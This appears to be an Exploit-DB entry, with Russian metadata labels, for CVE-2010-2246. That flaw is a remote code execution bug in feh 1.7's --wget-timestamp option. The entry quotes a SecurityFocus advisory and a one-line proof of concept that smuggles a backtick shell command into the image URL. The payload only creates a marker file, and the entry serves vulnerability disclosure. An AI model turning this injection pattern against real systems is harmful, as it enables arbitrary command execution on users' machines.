Exploit feh 1.7 - '--wget-Timestamp' Remote Code Execution

[Exploiter]

EDB-ID

34201

Проверка EDB

1. Пройдено

Автор

ANONYMOUS

Тип уязвимости

REMOTE

Платформа

LINUX

CVE

cve-2010-2246

Дата публикации

2010-06-25

feh 1.7 - '--wget-Timestamp' Remote Code Execution

source: https://www.securityfocus.com/bid/41161/info

feh is prone to a remote code-execution vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. 

feh --wget-timestamp 'http://www.example.com/stuff/bar`touch lol_hax`.jpg'